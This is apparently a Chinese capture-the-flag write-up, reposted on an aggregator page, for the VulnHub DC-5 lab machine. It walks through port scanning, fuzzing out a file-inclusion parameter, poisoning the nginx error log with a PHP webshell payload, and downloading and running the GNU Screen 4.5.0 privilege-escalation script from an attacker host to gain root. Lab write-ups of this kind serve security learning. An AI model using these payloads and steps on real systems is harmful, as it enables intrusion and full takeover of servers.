您的位置:首页 > 财经 > 产业 > 大连代办营业执照的正规公司_网站推广排名怎么做_创意广告_今日头条军事新闻

大连代办营业执照的正规公司_网站推广排名怎么做_创意广告_今日头条军事新闻

2024/12/23 17:03:24 来源:https://blog.csdn.net/weixin_46099552/article/details/143459471  浏览:    关键词:大连代办营业执照的正规公司_网站推广排名怎么做_创意广告_今日头条军事新闻
大连代办营业执照的正规公司_网站推广排名怎么做_创意广告_今日头条军事新闻

https://www.vulnhub.com/entry/dc-5,314/

主机发现端口扫描

  1. 探测存活主机,175是靶机

    nmap -sP 192.168.75.0/24
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:27 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00022s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00018s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.175
    Host is up (0.00016s latency).
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00015s latency).
    MAC Address: 00:50:56:FE:CA:7A (VMware)
    Nmap scan report for 192.168.75.151
    Host is up.
    
  2. 扫描靶机所有开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:28 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00040s latency).
    Not shown: 65532 closed tcp ports (conn-refused)
    PORT      STATE SERVICE
    80/tcp    open  http
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    
  3. 扫描服务版本及系统版本

    nmap -sV -sT -O -p80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:30 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00047s latency).PORT      STATE SERVICE VERSION
    80/tcp    open  http    nginx 1.6.2
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    57203/tcp open  status  1 (RPC #100024)
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    
  4. 扫描漏洞

    nmap -script=vuln -p 80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:33 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00052s latency).PORT      STATE SERVICE
    80/tcp    open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-csrf:
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.175
    |   Found the following possible CSRF vulnerabilities:
    |
    |     Path: http://192.168.75.175:80/contact.php
    |     Form id: fname
    |_    Form action: thankyou.php
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    

    没什么实质性信息,依旧是80端口开始

web渗透

  1. 访问主页

    在这里插入图片描述

  2. 扫描目录,没什么可以关注的

    dirsearch -u 192.168.75.175 -x 403
    //
    [13:40:35] Starting:
    [13:40:56] 200 -    4KB - /contact.php
    [13:40:56] 301 -  184B  - /css  ->  http://192.168.75.175/css/
    [13:41:00] 200 -    6KB - /faq.php
    [13:41:01] 200 -   17B  - /footer.php
    [13:41:03] 301 -  184B  - /images  ->  http://192.168.75.175/images/
    [13:41:25] 200 -  852B  - /thankyou.php
    
  3. 我们看官网下的小提示:这个特定的入口点可能很难识别,但它确实存在。您需要寻找一些不寻常的东西(刷新页面时会发生变化的东西),我们可以注意到每次提交footer页面的年份就会不一样

    在这里插入图片描述

    可能入口就存在页脚里

  4. 访问/footer.php ,一直刷新年份也会变,所以就是thankyou页面包含了footer.php ,可能存在参数来包含footer.php ,使用wfuzz来尝试混淆出参数

    # 尝试包含 /etc/passwd
    wfuzz -c -w /usr/share/wfuzz/wordlist/general/big.txt --hh 851 'http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd'
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************Target: http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd
    Total requests: 3024=====================================================================
    ID           Response   Lines    Word       Chars       Payload
    =====================================================================000001053:   200        70 L     104 W      2319 Ch     "file"

    混淆出参数file ,可能就是使用file 参数来包含文件的,成功包含/etc/passwd

    在这里插入图片描述

  5. 因为不存在登陆页面,所以包含了/etc/passwd文件也没用,根据CTF的思路我们尝试包含日志文件

    /thankyou.php?file=/var/log/nginx/access.log
    

    包含成功!

  6. 尝试后,UA插入php代码不成功。最后,我们可以将php代码插入到file参数后,使其发生错误,然后将该语句留在error.log

    (这里开始靶机IP改为176,之前乱搞把之前的靶机搞坏了)

    http://192.168.75.176/thankyou.php?file=<?php system($_POST['a']); ?>
    

    包含error.log ,存在&lt;?php @eval($_POST['b']); ?&gt; 即可

    2024/11/03 04:37:36 [error] 557#0: *63 FastCGI sent in stderr: "PHP message: PHP Warning:  include(&lt;?php @eval($_POST['b']); ?&gt;): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
    PHP message: PHP Warning:  include(): Failed opening '&lt;?php @eval($_POST['b']); ?&gt;' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.75.1, server: _, request: "GET /thankyou.php?file= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.75.176", referrer: "http://192.168.75.176/thankyou.ph"
    

    使用蚁🗡连接(密码是b,取决以你的post参数),然后在蚁🗡里面启动终端然后反弹shell

    在这里插入图片描述

提权

  1. 查看权限

    (www-data:/var/www) $ whoami
    www-data
    (www-data:/var/www) $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    (www-data:/var/www) $ uname -a
    Linux dc-5 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux
    
  2. 寻找敏感文件

    (www-data:/var/www) $ find / -perm -u=s -type f 2>/dev/null
    /bin/su
    /bin/mount
    /bin/umount
    /bin/screen-4.5.0
    /usr/bin/gpasswd
    /usr/bin/procmail
    /usr/bin/at
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/sbin/exim4
    /sbin/mount.nfs
    

    发现screen-4.5.0

  3. 搜索screen-4.5.0 是否存在提权漏洞

    searchsploit screen 4.5.0
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                   |  Path
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    GNU Screen 4.5.0 - Local Privilege Escalation                                                                                                    | linux/local/41154.sh
    GNU Screen 4.5.0 - Local Privilege Escalation (PoC)                                                                                              | linux/local/41152.txt
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    

    linux/local/41154.sh 拿去下来下载到靶机

  4. 执行脚本

    $ wget http://192.168.75.151/41154.sh
    converted 'http://192.168.75.151/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.75.151/41154.sh' (UTF-8)
    --2024-11-03 05:11:00--  http://192.168.75.151/41154.sh
    Connecting to 192.168.75.151:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1149 (1.1K) [application/x-sh]
    Saving to: '41154.sh'41154.sh            100%[=====================>]   1.12K  --.-KB/s   in 0s2024-11-03 05:11:00 (8.86 MB/s) - '41154.sh' saved [1149/1149]
    //
    $ chmod u+x 41154.sh
    //
    $ ./41154.sh
    ~ gnu/screenroot ~
    [+] First, we create our shell and library...
    [+] Now we create our /etc/ld.so.preload file...
    [+] Triggering...
    ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
    [+] done!
    No Sockets found in /tmp/screens/S-www-data.# id
    id
    uid=0(root) gid=0(root) groups=0(root),33(www-data)
    # whoiam
    whoiam
    sh: 2: whoiam: not found
    # whoami
    whoami
    root
    

    提权成功,读取flag文件

    # cat thisistheflag.txt
    cat thisistheflag.txt888b    888 d8b                                                      888      888 888 888
    8888b   888 Y8P                                                      888      888 888 888
    88888b  888                                                          888      888 888 888
    888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888
    888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888
    888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P
    888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "
    888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888Once again, a big thanks to all those who do these little challenges,
    and especially all those who give me feedback - again, it's all greatly
    appreciated.  :-)I also want to send a big thanks to all those who find the vulnerabilities
    and create the exploits that make these challenges possible.

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com